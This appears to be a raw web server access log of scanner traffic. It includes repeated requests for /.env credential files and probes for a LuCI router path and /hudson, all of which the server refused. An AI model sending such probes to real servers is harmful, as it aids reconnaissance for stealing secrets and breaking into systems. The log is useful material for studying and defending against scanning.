196.251.66.193 - - [01/Mar/2025:15:11:13 +0100] "GET /.env HTTP/1.1" 404 280 "-" "FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)"
193.68.89.10 - - [01/Mar/2025:15:15:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.66.193 - - [01/Mar/2025:15:15:07 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3"
204.76.203.15 - - [01/Mar/2025:15:21:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.166.90 - - [01/Mar/2025:15:25:50 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
196.251.72.73 - - [01/Mar/2025:15:30:00 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
154.212.141.206 - - [01/Mar/2025:15:40:01 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
216.218.206.66 - - [01/Mar/2025:15:44:38 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [01/Mar/2025:15:47:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910141403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.144.212.139 - - [01/Mar/2025:15:51:47 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/68.0.3440.75 Chrome/68.0.3440.75 Safari/537.36"
20.65.193.150 - - [01/Mar/2025:15:51:50 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
